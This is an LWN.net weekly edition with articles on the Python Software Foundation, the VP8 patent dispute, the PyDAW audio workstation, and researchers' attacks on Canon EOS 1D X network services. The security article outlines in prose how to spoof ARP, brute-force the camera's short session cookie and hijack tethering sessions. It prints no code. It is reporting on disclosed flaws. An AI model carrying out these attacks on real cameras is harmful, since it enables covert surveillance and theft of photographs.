User: Password:
|
|
Subscribe / Log in / New account

LWN.net Weekly Edition for April 4, 2013

PyCon: What does the Python Software Foundation do?

By Jake Edge
April 3, 2013

Sometimes, foundations and other organizing groups are almost invisible to the people that they serve. That can be a good thing in some ways, because it means that most of what the group does is running so smoothly that nobody notices the well-oiled machine humming away in the background. But there are downsides too, as people may not be aware of all of the opportunities for funding and other assistance that the organization can provide. Python Software Foundation (PSF) director Brian Curtin gave a talk at PyCon 2013 to try to ensure that the gathered "Pythonistas" at the conference were up to speed on the PSF.

[Brian Curtin]

Curtin started out by noting the visibility problem for the PSF. Most people know that it exists and perhaps a little bit about what it does. But there are things that PSF does that are not well known, so people are unaware of ways the PSF could help their projects. There are also activities that other groups are doing that could help the PSF. Basically, there is a bit of a disconnect between the PSF and others in the Python community. His talk was meant to bridge that gap.

The PSF is a 501(c)(3) US non-profit organization, which means that it is tax-exempt and that donations to it are tax deductible (in the US). It is made up of both individual members and sponsor members, which are organizations that make an annual donation to the PSF.

The PSF Mission Statement makes it clear that the organization is "for everybody", Curtin said. It is meant to support core developers, people writing Python code, people using Python programs, the people at PyCon, and so on. It is "big P Python", not just "/usr/bin/python on your latest MacBook", he said.

Part of PSF's mission is to promote the language, and events like PyCon are one way to do that. There were also a variety of tutorials surrounding PyCon that promoted the language to children and to programmers who use other languages. Protecting the language is another piece of the mission. That includes protecting the Python trademark, for example, as it recently did in a European dispute. It also involves maintaining the PSF license for Python. The final piece of the mission is to "advance" Python. That effort is partially to fund Python development, but there is more to it than just core development. It is meant to push the Python community forward through funding a variety of activities.

Who is the PSF?

The 200+ individual members of the PSF were nominated by existing members based on their efforts to "promote, protect, and advance Python". Beyond just core developers, the list includes community and conference organizers, developers of Python web frameworks, evangelists, and so on. It is people who are "trying to make the Python world better".

There are also roughly 30 sponsor members, who are companies or organizations that like and use Python. Those members donate annually because they believe in the mission of the PSF. They see a great benefit from being able to freely download and use Python throughout their organization. In return, the PSF tries to keep the Python world running smoothly so that those organizations can continue to be successful.

There are several PSF committees—made up of both members and others from the community—that are charged with handling a specific piece of the PSF's mission. For example, the Sprints committee is responsible for helping fund development sprints. Originally, sprint funding was focused on CPython (the C language Python core), but that has changed. Now, anyone who is "making Python better through code" is eligible for funding. The committee has funded PyPy and Django sprints as well as efforts to create new web sites for user groups.

Typically, the money is used to buy food or rent meeting space, but other things are possible too. The Cape Town users group was one of the first to use PSF sprint funding. It used the funding to make socks and coffee mugs with the Python logo for sprint participants who went on to do lot of work to make matplotlib and Genshi work on Python 3.

There is an Outreach and Education committee which does much what its name would imply: funding educational and community building efforts. The Trademark committee looks after the Python trademark. It was instrumental in resolving the recent European dispute, but more generally works to ensure that user groups and others are following the trademark policy. There is also an Infrastructure committee that handles the web servers for python.org, the Python wiki, the Mercurial repository, and so on. The PSF has recently added two part-time system administrators to help keep the infrastructure running well.

PSF grants

The PSF also grants money for specific projects. For example, Kivy, NLTK, and Pillow were recently granted funding to complete specific features or releases. In the past, the PSF funded Brett Cannon to create a Python developer's guide to help get new contributors up to speed.

[Some sponsors]

Conference grants are another big part of what the PSF spends its money on. In 2012, it granted $33,000 to 18 conferences in 15 countries. It wants to help other conferences "all over the world" grow to be more like PyCon. The smaller conferences have trouble attracting sponsors sometimes (unlike PyCon, which had multiple chock-full sponsor pages), so the PSF helps out. Curtin said that the PSF plans to double its contributions to each of the conferences for 2013.

The Sprints and Outreach committees both have their own budgets, so they can make funding decisions without needing to go to the board of directors for money. Sprints has a $5000 annual budget, and will reimburse expenses up to $300 for approved sprints. It "works well and people like it", he said, and the committee would like to see it grow. He gave a long list of sprints that had been funded all over the world. There have been a lot of repeat groups applying for funding, which is good, but the committee would like to see new groups representing new geographical areas apply. The Outreach committee has funded a wide variety of workshops and other activities including PyStar Philly, PDX Python, PyCamp Argentina, and more.

The PSF also gives out awards to give back to contributors, so that they know their work is appreciated. There are two community service awards given each quarter, which include either a $500 check or free PyCon registration plus up to $500 travel reimbursement. The Frank Willison memorial award is given yearly at OSCON to an outstanding Python contributor, and is awarded by O'Reilly Media based on a recommendation from the PSF. In 2012, the $5000 distinguished service award was added to recognize "sustained and exemplary contributions" to Python. The inaugural award was made posthumously to matplotlib creator John Hunter.

The PSF is always looking for more ways to advance "big P" Python. It is currently "kicking around" some ideas on how to serve local Python communities better, perhaps by way of regional representatives to the PSF. That would help ensure that word about what assistance the PSF can provide gets out to all of the local groups that could take advantage.

In order to have money to give away, the PSF has to raise money. PyCon is the biggest fundraiser for the organization, but the sponsor members also help replenish the funds as well. There is a (non-voting) associate member class for those who donate to the PSF. Curtin would like to see that program built up and to make it more attractive for people to contribute that way with T-shirts or other incentives. He ended his talk with a pair of questions: Can the PSF help you? Can you help the PSF? He encouraged anyone with ideas in either direction to contact the PSF.

PyCon wrap-up

If PyCon is the major fundraiser for the PSF, it seems likely to have a long and prosperous future ahead of it. This was my first visit to PyCon (with luck, not my last) and it is an impressive conference. Lots of excellent technical talks, with an engaged and excited community in evidence. Getting 2500 enthusiasts together in one place for a few days will do that.

[Expo floor]

One fear when attending a conference with an "expo hall" is that it will have gone down the path of LinuxWorld (or the RSA Conference and other large "industry" conferences), where much of the content is targeted at executives and other non-technical folks. Those kinds of conferences have their place, I suppose, but they don't offer much in the way of intellectual stimulation. PyCon was certainly not that kind of conference, though it had a large contingent of company and organization booths. While I didn't spend much time on the expo floor, it was always crowded with attendees.

While PyCon 2013 will be known to some because of an unfortunate incident that occurred, that incident does not typify the conference at all. In fact, it is clear that PyCon (and the PSF) have made great strides in trying to even out the gender imbalance typically seen at free software conferences. Of the 116 talks in six tracks, 22 were given by women. That ratio is roughly the same as that of the conference as a whole, which was 20% women. Progress has certainly been made; one can only hope more will be.

There were lots of talks that I sat in on but wasn't able to write up and even more that I wasn't able to sit in on at all. There is a whole lot going on in the Python world and that is clearly reflected in the conference lineup. For anyone with an interest in the language, PyCon 2014 (in Montréal, Canada) should get strong consideration.

Comments (none posted)

The VP8 wars heat up ... again

By Nathan Willis
April 3, 2013

Just when it seems like the Internet is done fighting about video codecs, another salvo is fired. Google recently announced an agreement with the codec patent holders at the MPEG Licensing Authority (MPEG LA) that allowed Google and all other third parties to use Google's VP8 codec without fear of MPEG LA's patent infringement claims. The agreement was a major win for VP8, and soon afterward momentum picked up to push for VP8's adoption in a variety of web standards. But shortly after the announcement, Nokia jumped into the fray, asserting that it had numerous patents on which VP8 infringed, and that it would not license them. There is no telling where the Nokia incident will head, but on the heels of its victory in the MPEG LA fight, Google may be unlikely to back down.

History lesson

As a refresher, MPEG LA is a consortium that sells licensing agreements for various multimedia codecs; member companies contribute their relevant patents to a "pool," then MPEG LA sells one-stop-indemnification against patent infringement lawsuits based on those contributions. Despite its confusingly-similar name, MPEG LA is not affiliated with the Motion Picture Experts Group (MPEG), which is a joint ISO/IEC working group that produces media compression specifications.

In recent years, MPEG LA's highest-profile cash cow has been the H.264 video codec. In 2009, H.264 proponents successfully lobbied to keep the open-source Theora video codec from being named as a "mandatory to implement" (MTI) part of the HTML5 standard. Arguably in response to the threat posed by Theora, MPEG LA agreed to make H.264 decoders royalty-free for video that is delivered over the Internet for free to end users. That meant that non-subscription services like YouTube can deliver H.264-encoded content to users without the users needing to shell out any cash, but it still left plenty of opportunities for royalty-collection by MPEG LA, including for-pay video services, physical media like Blu-Ray discs, and video encoders.

Theora was derived from a codec called VP3, which was developed by codec shop On2 Technologies and was released as open source in 2002. VP3's code was donated to the Xiph.org Foundation along with a royalty-free patent grant. In 2009, Theora was quite a bit older than H.264, but its real selling point was its royalty-free nature. Still, H.264 proponents included MPEG LA members who both profit from H.264 licensing and make web browsers (such as Microsoft and Apple), and they claimed that Theora was both technically inferior to H.264 and infringed on MPEG LA patents, too.

The HTML5 video codec argument ended in a stalemate with neither codec becoming enshrined in the specification, but Google changed the tenor of the entire debate in February 2010, when it purchased On2 for US $124 million. On2 had released several codecs since VP3/Theora, including one called VP7 that it claimed was superior to H.264. In May 2010, Google released the next generation codec VP8 under a BSD-style license, along with an irrevocable royalty-free patent grant to all of the company's VP8 patents, under the banner of the WebM media format (which uses VP8 for video and Vorbis for audio).

But the VP8 patent grant did not deter MPEG LA; immediately after Google's announcement, the group said that it was looking into forming a patent pool around VP8. In February 2012, it asked for contributions to a VP8 patent pool, and in May announced that 12 companies had responded.

March madness

Despite MPEG LA's triumphant announcement, it never actually unveiled a public VP8 patent pool (if that is what one does with a pool). Nor did it initiate any patent infringement litigation against Google or anyone else. Prior to March 2013, the only major news events around VP8 or H.264 was Mozilla's controversial decision to enable H.264 decoding on certain platforms by passing decoding duties down to hardware decoders. At the time, Mozilla's justification was that its efforts were better spent ensuring that royalty-free codecs would be adopted in newer standards like WebRTC. Indeed, WebRTC arrived in February 2013, with VP8-based interoperability implemented by Mozilla and Google.

Thus, it came as a bit of a surprise on March 7 when Google announced that it had reached an agreement with MPEG LA about VP8. The full terms were not made public, but the announcement said that Google had been granted licenses to the MPEG LA patents that "may be" essential to VP8, and that MPEG LA would discontinue its VP8 patent pool.

The terseness of the announcement led to considerable speculation online; some even assumed that Google had paid a licensing fee to MPEG LA for some or all of the infringing patents. But the language of the announcement is weighted entirely in Google's favor:

... agreements granting Google a license to techniques that may be essential to VP8 and earlier-generation VPx video compression technologies under patents owned by 11 patent holders. The agreements also grant Google the right to sublicense those techniques to any user of VP8, whether the VP8 implementation is by Google or another entity. It further provides for sublicensing those VP8 techniques in one next-generation VPx video codec. As a result of the agreements, MPEG LA will discontinue its effort to form a VP8 patent pool.

Specifically, the grant covers all of VP8's predecessors, covers its next iteration (which is already under development), applies to any implementation of VP8 (whether derived from Google's or not), and leaves Google free to sublicense the patents to third parties at will. Xiph.org's Christopher Montgomery summed up the agreement as "Google won. Full stop." After the announcement, Google's Serge Lachapelle elaborated on the agreement in an email to the W3C's rtcweb mailing list, saying that Google "intends to license the techniques under terms that are in line with the W3C’s definition of a Royalty Free License" in the coming weeks, and adding that the agreement with MPEG LA "is not an acknowledgment that the licensed techniques read on VP8."

Since patent licensing is MPEG LA's sole reason to be, it is indeed difficult to hypothesize a set of secret conditions that would amount to the agreement being a favorable outcome for its side. A lot of technology companies end their patent disputes with a "cross-licensing" agreement, which amounts to a pact to not sue each other over the patents, but allows both companies to continue to wield them against others. Google certainly has a patent portfolio; a Google–MPEG LA agreement of this form would be plausible, but there is no mention of cross-licensing. If it was part of the deal, it is strange that MPEG LA would not mention it, considering that its business hinges on such licensing deals. Similarly, it is unknown if a cash payment by Google was involved; if so, such a cash payment would have to be sizable indeed for MPEG LA to potentially undermine its own future business interests by walking away from the fight with nothing to show for it publicly.

Another possible scenario is that the primary reason for the agreement was that Google privately demonstrated something even more harmful to MPEG LA, such as invalidating some key MPEG LA patents, or disclosing patents of its own that pose a serious threat to one of MPEG LA's key properties. Cash might or might not have greased the wheels of deal-making. Alas, it is doubtful that we will ever know for sure so long as corporate lawyers roam the earth.

Many in the web standards bodies, meanwhile, were so relieved to hear of the deal that they quickly rallied to promote VP8 and WebM. Lachapelle proposed that VP8 be adopted as WebRTC's MTI codec. Codec expert Rob Glidden reported that Google had also submitted VP8 for consideration in MPEG's still-under-development Internet Video Coding (IVC) standard. Steve Faulkner even proposed reopening the issue of including an MTI video codec in HTML5.

Oh yeah; Nokia

VP8's rosy future hit an abrupt obstacle a few days later, however. As Pamela Jones at Groklaw reported, a Nokia representative interrupted a Google talk about VP8 at a recent IETF meeting to announce that Nokia owned a number of patents upon which VP8 was infringing, and that it would not license them. Nokia put its claim on file with the IETF, listing 64 patents in various jurisdictions (many of which are simply jurisdictional duplicates of the same invention claims) plus 22 pending patent applications. A few news sites noted that MPEG LA's tally of prospective VP8 patent-poolers was 12, and that only 11 companies were mentioned in the Google–MPEG LA agreement; perhaps, then, Nokia was the holdout.

Whether or not it was the missing party is tangential; the real questions are whether the claimed patent infringements are legitimate, and what Google will do about them. Jones broke down the list of patents and removed the duplicates, then called for a search to turn up prior art. That is certainly one approach that might yield results. Another would be for Google to perform a thorough investigation and decide that some or all of the patents do not apply; as Thom Holwerda at OSnews observed, that is the approach Xiph.org took when a similar patent infringement charge was raised over the Opus audio codec—which was subsequently cleared by the legal review team and approved as WebRTC's MTI audio codec.

The odds are that Google's legal department has already conducted a pretty detailed examination of VP8, of course. So it is hard to say what the next move will be. WebM project manager John Luther pointed out that there was never any lawsuit nor finding of infringement in the MPEG LA case. He called it a distraction, and said that the project unfortunately had to keep quiet while the talks were in progress. So we may not hear much more from Google on the subject of Nokia's claims until Nokia files a lawsuit or another surprise announcement reveals how it all turns out.

For the time being, arguably the most puzzling aspect of this latest development is the fact that Nokia is wading into the argument in the first place. There is plenty of speculation as to why—every theory from puppetry on behalf of Nokia's business partner (and H.264 proponent) Microsoft to a gamble that Google will pay the financially-troubled Finnish phone maker to make the problem go away.

Of course, Google already knows if Nokia was the mysterious twelfth member of the defunct MPEG LA patent pool, and, if it was, then Google has known about its patents for quite some time. But either way, nothing stops any other company from springing a similar attack on VP8 or any other codec. In the battle to make VP8 an MTI standard in any web specification, the parties that benefit from license sales of rival codecs have no incentive to cooperate. That goes for H.264 as well as for the next generation, and it is not merely a hypothetical problem. Apple's Maciej Stachowiak has already voiced his objection to making VP8 an MTI standard in HTML5. The agreement between MPEG LA and Google has smoothed over the issue of VP8's patent status, but it cannot perfectly resolve it, simply because nothing can.

Comments (35 posted)

A look at PyDAW

April 3, 2013

This article was contributed by Dave Phillips

Linux offers a great many components from which a powerful digital audio workstation (DAW) can be built. But, as an heir to the UNIX design philosophy of modularization, Linux does not offer much in the way of high-level, monolithic audio applications. Thus, an electronic musician coming into Linux from Windows may have a difficult time piecing together and configuring a self-contained audio production environment. Composer/developer Louigi Verona has written extensively about the trials and tribulations of his own switch to Linux, and would-be converts are well-advised to study Louigi's notes and commentary before taking the plunge.

Developer Jeff Hubbard wants to provide a solution to this problem with his PyDAW project, a singular environment for the Linux-based musician working in contemporary electronic music. PyDAW supports audio/MIDI sequencing in a well-designed GUI that includes a piano-roll interface for MIDI event entry, an audio sample editor, and a set of graphical editing tools for designing control curves for various integrated sound parameters. An audio mixer, a suite of instruments, and a set of signal processors round out PyDAW to make it a self-contained system for producing electronic music with Linux.

PyDAW has been designed to appeal to users who want to avoid the difficulties presented by excessive modularity. No external plugin architecture is supported, and the author has indicated that its JACK deployment may be discontinued in favor of direct communication with ALSA. While these decisions may seem heretical to other Linux audio developers and users, they proceed from PyDAW's basic design philosophy, i.e. to provide a complete system for immediate and uncomplicated use by musicians working in a specific genre.

PyDAW requires modern hardware, and its performance reflects the host machine's capabilities. A sufficiently powerful laptop is usable, but the author prefers a desktop system equipped with an audio interface designed for high-quality sound. A dual-core 64-bit CPU with 4G memory is a base system for adequate performance, a quad-core system with 8G memory is recommended. An eight-core or better system with 16G memory would be optimal for fully exploiting PyDAW's capabilities.

You can download PyDAW in pre-built versions for Ubuntu and other deb-based systems, as a source tarball for a local build, and in an ISO image for a bootable DVD or USB stick. The bootable images include a plain-vanilla Ubuntu 12.04 for AMD64 systems, PyDAW's target Linux distribution.

A Git repository is also available for anyone with an interest in the project's most recent development. Building PyDAW is uncomplicated, with minimal and readily available dependencies, though it should be noted that the project expects Python 2. To be clear, Python is required for the program's PyQt4 user interface bindings. The DSP components — synths, fx, sampler, etc. — are written in standard C, with their Qt4 GUIs written in C++. PyDAW is licensed under GPLv3.

Unfolding PyDAW

PyDAW is a work in progress, with a fast rate of development, so be aware that the descriptions here are subject to change. This review is based on versions from the 12.xx series through 13.03-8. Subsequent versions may change the program's internal and/or external aspects significantly. See the PyDAW Web site for current information about project development and the latest release.

[PyDAW main screen] The program opens to the main arrangement screen seen to the right. The top menu bar offers some basic file operations, an offline rendering dialog, a theme manager, and links to the program's Web site and online manual. Immediately below the top menu we see the PyDAW transport and tempo controls, the active region and loop mode indicators, and the MIDI input port selector. Beneath the transport control bar we see six editor tabs, with the Song/MIDI tab set as the default. The top row of the Song/MIDI tab presents a series of empty grey boxes, numbered 0 through 12. Click any box to open the region creation dialog.

Double-click on an item to open the default item editor, a "piano-roll" display for MIDI events recorded from an external device or entered manually. Other editors include GUI and numeric list displays for designing envelopes for parameter controllers, pitch-bend, and velocity values. Multiple items can be edited as a single item — a very cool workflow amenity — with all editors expanded to the specified range.

The CC Map tab displays the default MIDI controller assignments. Controller maps have been prepared for PyDAW's instruments and processors, another workflow amenity that speeds up the design and application of gain curves for synthesis/processing parameters such as filter cutoff frequency, volume control, and low-frequency oscillator (LFO) modulation depth.

For its internal sound sources PyDAW comes equipped with two synthesizers. Ray-V is a virtual analog synthesizer constructed in a standard architecture with a single-panel UI for uncomplicated programming. However, there's nothing missing its design: Ray-V provides two oscillators with four source waveforms, filter and amplitude stages with ADSR envelopes, a pitch envelope, noise and distortion generators, an LFO, and a master mixer section with controls for glide and pitchbend. Ray-V's presets indicate its possibilities in a set of synthesizer pads, leads, and percussion sounds.

Way-V is PyDAW's wavetable synthesizer. Sixteen waveforms are available to each of Way-V's two oscillators, the output from the oscillators is sent to their optional ADSR envelopes, move to a non-optional master ADSR, and finally reach the master mixer. The mixer includes glide and pitchbend controls, and a noise generator is available. The PolyFX processing module mixes the synthesizer's output with up to four effects processors, sending the blend on to PolyFX's own LFO and two ADSR output envelopes. Alas, Way-V includes no preset patches, but new sounds can be created quickly and easily. With my laziest method I merely select different wave types for the default patch. In a more energetic mood I apply and modify Way-V's other parameters for more complex sound design.

[PyDAW modulex] Per-track effects processing is managed by the Modulex multi-effects device. Up to six processors can be applied, with available modules for nine filter types, two distortions, a limiter, an equalizer, and a panner. Two pre-defined modules are also available for reverb and a tempo-synchronized delay line.

A caveat for the unwary: MIDI track definitions (instrument, FX, level, state, solo/mute status) persist from region to region. Item definitions behave similarly, with changes in an item applied to all instances of the item, i.e. the original and its copies in any regions. Fortunately, items can be "unlinked" for individual edits, but the user is advised to learn what's fixed, what's flexible, and the default status of objects in the PyDAW UI. Hint: Right-click on a region or item to see available operations.

At the macro-composition level PyDAW's tools promote a rapid workflow. Regions and items can be copied and moved singly or as a group, and playback can be looped to region or item bar, allowing realtime arrangement of your material. By the way, items can be copied and pasted between regions, also in realtime.

[PyDAW audio sequencer] Audio content can be set into a track either by employing the Euphoria sampler, by recording new audio directly, or by using the audio sequencer (seen to the left). Euphoria supplies the expected sample file handlers — load/save, MIDI key assignment and range, sample tuning, MIDI velocity sensitivity — and provides a hook to the Audacity soundfile editor for more detailed editing. The audio sequencer's Viewer tab is especially useful for arranging recorded material in arbitrary patterns, with snap-to available for bar/region boundaries (or not at all). Double-clicking on a waveform in the Viewer or single-clicking anywhere in the Item List invokes PyDAW's built-in sample editor, a limited-by-design utility for quick and easy work with time-stretching, pitch-shifting, and setting loop points.

The Tracks tab provides a virtual audio mixing board with five input strips and five buses (master plus four). Input can be routed to any of the eight tracks, each of which has its own bus selector, solo/mute switches, and effects processing. PyDAW isn't designed to be a first-choice application for recording and mixing by electroacoustic instrumentalists, but the facilities are there if needed and they are certainly useful for the creation of new sound samples.

A word about PyDAW's offline rendering: The dialog presents good defaults, the process is very fast, and the output format is an acceptable 32-bit stereo WAV file. That's the word, short and sweet.

Using the program

Initial workflow proceeds from the top downwards, from Region to Item to Event. Objects are invoked quickly to sustain creative momentum — left-click in the Region/Item areas to invoke those objects, right-click to open their available operations — and many edits can be accomplished with commonly-used keyboard accelerators (Ctrl-C to copy, Ctrl-V to paste, Del to delete). Mouse behavior is predicated by the active editor. For example, group selection in the piano-roll grid is made by holding down the Ctrl key while sweeping with the mouse with any button held down. In the continuous controller and Pitchbend editors it isn't necessary to hold the Ctrl key while making the selection, again with any button pressed.

PyDAW allows any number of sequential Items to be edited as a group. The piano-roll and the continuous controller displays will reflect the decision and show the increased time period. A similar feature allows arbitrary grouping of items for copy/paste operations, a welcome device when creating complex arrangements from multiple items across multiple regions.

I had no problems with basic operations in the PyDAW audio sequencer. Audio clips are arranged on a region-assigned timeline, i.e. the clips play along with the passage of the Song's regions. They can be snapped to bar or region boundaries, or they may be freely placed on the timeline. Only one audio item is allowed per line, and only horizontal replacement is permitted. Double-clicking on an audio clip in the audio sequencer will invoke a basic editor for massaging your sound samples. The editor is intentionally feature-limited, with particular attention given to setting loop points, stretching or squashing the sample length, and changing its pitch. Again, all operations are easy to access and can be applied quickly.

Fizz-pluck-bang [MP3] is a short demonstration piece made with PyDAW 13.03-6. With the exception of one problem getting my laptop's internal microphone to work, all my objectives were met in the piece. I created MIDI sequences in the piano-roll editor that drove sound samples in Euphoria and synthesis patches in Ray-V and Way-V, I added drum loops with the audio sequencer, and I applied a simple volume control curve for one of the synthesizers. Macro-level formation was made simple with PyDAW's easy arrangement of Regions and Items, and the offline rendering was flawless.

The PyDAW author has suggested some recommended settings for improving PyDAW's performance with JACK. Discontinuities in the audio stream can be reduced by switching off JACK's realtime option and raising its buffer period size. Latency will increase, but performance is more stable. Until PyDAW is rewritten for direct connection to ALSA I suggest following Jeff's advice, with a little experimentation with your JACK settings to find the happiest numbers.

The documentation

Documentation currently consists of the online manual, a wiki, and a forum for exchanges between users and developers. The online docs may not be up-to-date with the latest changes, so it's a good idea to join the forum where Jeff and his associates are quick to respond to reports and suggestions. Jeff is also available on the PyDAW forum at KVRaudio.

For more examples of music made with PyDAW, check out the PyDAW Music page on SoundCloud. New works are also announced on the KVR forum.

TODO

PyDAW can stand improvement in some areas. More presets for the Ray-V synthesizer would be nice; any presets for Way-V would be nicer. Cut/copy/paste and multiple selection would be welcome in the audio item display, the audio sequencer could be more flexible, documentation needs some love, and a metronome would be helpful. Fortunately Jeff works to fix PyDAW's most egregious bugs as quickly as possible, and I must note that I've encountered no show-stoppers in recent releases.

Personals

I tested PyDAW in three settings. I built it from source code on uniprocessor machines running Arch 64 and KXStudio (Ubuntu 12.04 in i386 mode), platforms clearly underpowered for PyDAW, with predictably poor performance. As I recommended earlier, you'll need a multicore CPU, preferably in native 64-bit mode, with at least 3G memory, to experience PyDAW's full capabilities.

Incidentally, it is worth noting that more audio software is demanding the power of multicore hardware. Harrison's Mixbus and the upcoming Bitwig Studio both require a multicore machine, and explicit support for multiprocessor hardware is present in Ardour3 and Csound.

My best-case reports come from running PyDAW on a dual-core laptop. I built and ran the program under KXStudio (again in i386 mode), and I also ran it from a bootable USB stick created with the 64-bit ISO image from the PyDAW SourceForge site. I followed Jeff's suggestions for improving performance by taking JACK out of realtime mode and increasing its buffer size. My tests weren't realtime-critical, and the higher latency was worth the more pleasant experience while learning how to use the program.

Outro

As stated earlier, PyDAW may not be for everyone but it will surely appeal to many contemporary computer-based musicians. If you're into EDM and other electronic styles you should check it out, with the full understanding that the project is still in development (PyDAW v.3 is already in progress) The author wants to know about any bugs or unexpected behavior you encounter in his program, you can reach him on the KVR forum and on the PyDAW wiki.

Comments (1 posted)

Page editor: Jonathan Corbet

Security

Exploiting network-enabled digital cameras

By Nathan Willis
April 3, 2013

Consumers can now add digital cameras to the list of purchases that come with built-in networking functionality, which means said cameras can also be added to the list of items at risk of being compromised or disabled by remote attackers. Two security researchers presented a talk at Schmoocon 2013 in February detailing a series of attacks against high-end Canon digital cameras. While the speakers did not address a wide range of manufacturers, they were able to access and control the Canon camera with very little effort. Part of the vulnerability stems from poor security engineering on the camera-maker's part, but part of it is baked into the feature set.

Speakers Daniel Mende and Pascal Turbing are both researchers at German IT security firm ERNW. They presented their talk ("Paparazzi over IP") on February 16, although it made headlines in late March when the video from the session was publicized by Help Net Security. Mende and Turbing set out to compromise an EOS 1D X digital SLR (DSLR), Canon's current flagship model, retailing at just under US $7000. The 1D X includes built-in Ethernet connectivity that is used to enable many of the same features typically run over USB in less expensive models: file download, browsing and deleting images, tethered shooting, and so on. It also sports an accessory port, to which a Canon-made WiFi dongle can be attached.

The target

Mende and Turbing were able to successfully mount a number of attacks against the camera, resulting in denial of service, man-in-the-middle attacks which could disclose or delete camera information, and hijacking authorized network sessions. The camera offers several means for accessing the contents of its memory cards remotely (which is rarely a feature desired by the security-conscious), but its remote-control functionality (i.e., tethering the camera to a computer) was insecure, too. At the moment, the team admits, only high-end Canon models are affected by their findings, but network functionality is found in high-end Nikon hardware as well, and virtually all manufacturers are bringing networking to their less expensive camera offerings.

Mende and Turbing noted that the 1D X included a more-or-less complete IPv4 stack, which allowed for attacks at several networking levels. They attempted a few of them, they said, but turned the majority of their time to the more interesting challenge of attacking the custom services offered by the camera. But they did mention a few attacks that would prove useful later on.

At Layer 2, for example, they pointed out that both ARP spoofing and ARP flooding were possible. By spoofing ARP packets from anywhere else on the same Ethernet segment or WiFi network, an attacker could intercept any traffic between the camera and a computer and get man in the middle access. They also noted that the embedded controller has very little memory, so a denial-of-service was possible by sending the camera just 100 ARP packets per second. At the TCP/IP layer, mounting a TCP reset attack was similarly trivial.

Canon at your service

Naturally, the whole point of including a built-in TCP/IP networking stack in the camera is for the manufacturer to run services over it. As Mende and Turbing explained, the 1D X offers four networked services: FTP Upload mode, Digital Living Network Alliance (DLNA) mode, Wireless File Transmitter (WFT) Server mode, and EOS Utility mode. In FTP Upload mode, images shot by the camera are automatically uploaded to a pre-configured FTP server (which could be a very important feature for photojournalists in dangerous locations or under time pressure); DLNA mode is also used for network access to the images on the camera, but by providing a general-purpose DLNA media source that other DLNA products can easily discover and read from.

The final two modes offer control of camera functions. In WFT Server mode, a built-in web server provides browser-based access to tethered shooting functionality, while EOS Utility mode offers more or less the same functions by connecting the camera to Canon's desktop camera control application. The tethering capabilities of the two modes are essentially the same, and are often used in studio photography set-ups. All four networking modes, it should be noted, must be activated on the camera, and cannot be switched on remotely, a limitation which does provide some protection for the camera owner.

FTP Upload mode allows the shooter to relay images to a remote server as they are taken; this could be useful (for example) for photojournalists in the field when time is of the essence. The FTP server address and its authorization credentials must be entered manually on the camera's configuration menu, so completely hijacking an unattended camera is not possible. However, as is common knowledge, FTP credentials are transmitted in the clear, so the entire session can be sniffed; when used in conjunction with the ARP spoofing attack mentioned earlier, an attacker could even spoof the FTP server side of the connection entirely.

DLNA mode is no more secure, and again it is the underlying protocol that is to blame. DLNA is designed for consumer electronics used in the home; there is no real attempt to make connections or service discovery private or secure. DLNA devices broadcast their network address over UPnP, and they offer up all of their content to other DLNA devices (in theory, "renderers"—media player front-ends like TVs) over HTTP. There is no authentication or access control. Anyone on the same network segment can see the UPnP advertisements sent out by the camera, and can access all of its stored media.

WFT mode and EOS Utility mode both offer a bit more of a security story, but both of them have grave flaws. WFT mode uses a tiny built-in web server to deliver a JavaScript-powered web application to the browser, Mende and Turbing reported. The server uses HTTP basic authentication, and stores a session identifier (of the form sessionID=40b1) as a plaintext cookie on the authenticated browser. A man in the middle can sniff this transaction, they said, but the session ID is also a mere four bytes in length. If a user is logged in, someone else can connect to the web server and guess the cookie value with brute force—Mende and Turbing wrote a six-line Python script that could brute-force the session ID in about twenty minutes (depending on how busy the camera is). There is no notification to the logged in user that someone else is impersonating the session.

Once authenticated, the attacker has control over most, but not all, of the camera's automatic functions: picture-taking, focus, changing settings, and so on. The attacker can even activate "live view" mode, which relays a through-the-lens view to the remote browser. In addition, the attacker can browse, download, and delete existing images.

EOS Utility mode offers many of the same features (including shooting and live view mode), but it is designed to connect to Canon's Mac OS X or Windows client applications. The connection method and communication protocol are different, however. When put into EOS Utility mode, the camera advertises itself to the network using the Simple Service Discovery Protocol (SSDP) (which is a multicast message visible to all). The very first time it is used, the camera must manually be put into pairing mode, but subsequently the desktop client and the camera perform a simple handshake, which Mende and Turbing were able to reverse engineer.

The protocol used for communicating between the client application and camera is called PTP/IP, the IP-delivered variant of the standardized Picture Transfer Protocol (PTP) commonly implemented over USB (gPhoto and many other open source applications speak PTP already). At first, Mende and Turbing said, they were concerned that the EOS Utility handshake would be difficult to crack; the authentication command contains a 16-byte ID and a hostname string. But although one would assume that the hostname would be matched against the computer paired with the camera during the first-run setup, they discovered that in fact it is not used at all. Furthermore, the 16-byte ID value is broadcast (in obfuscated form) by the camera in its UPnP messages. Ultimately, an attacker does need an authenticated user to have an active session, but the attacker can disconnect it with the TCP reset attack mentioned earlier and immediately replay the credentials, taking over the session. Of course, the attacker will probably also need a copy of Canon's client application in order to do anything useful (it is unknown if other PTP implementations like gPhoto can control the cameras directly), but Canon provides free downloads of that as a convenience.

Cinéma vérité

Mende and Turbing performed a live demonstration in their session, which revealed some additional details. For example, the camera must be pinged regularly or else it will drop the EOS Utility connection (a limitation that stealing images via the other three methods does not suffer from). The PTP/IP connection also has an upper limit on its throughput of about 2 megabits per second, which means stealing images from across the coffee shop can be time consuming. Mende and Turbing used smaller JPEG format for the images in their demonstration; raw files on the 1D X are in the 20MB range. The pair also said that they were able to disable manual control of the camera when connected in EOS Utility mode. The owner of the camera could always power-cycle the camera, of course, but this is yet another possible denial-of-service approach.

The speakers commented that activating live view mode of a camera remotely had privacy implications, since an attacker could spy on someone else through a device thought to be sitting idle. They speculated that the surveillance risk might be even higher if they find a way to activate the camera's microphone, which so far they have not been able to do. Audience members asked some interesting questions, such as whether firmware updates might patch any of the flaws discussed. Mende and Turbing replied that there had been two firmware updates since the camera's release, and that all of the attacks were carried out with the most recent release. A Bluetooth dongle is available from Canon as well, and another audience member asked about its potential for attackers. The speakers replied that it appears to be capable of connecting only to a GPS unit. But perhaps it is only a matter of time until Bluetooth becomes a problem, too; the pair ended the talk by noting that Canon's latest offering, the EOS 6D, adds a WiFi access point mode and a new protocol designed for interfacing with iOS and Android apps.

It might be hard to accurately gauge the risk of security flaws in a top-of-the-line digital camera, but as Mende and Turbing noted, the features found on the super expensive camera of today are working their way to the consumer-grade product of tomorrow. At the moment, the photographer processing images in the hotel after a big event needs to worry the most. Photographs can be stolen, altered, or even replaced if one is careless enough to trust the network.

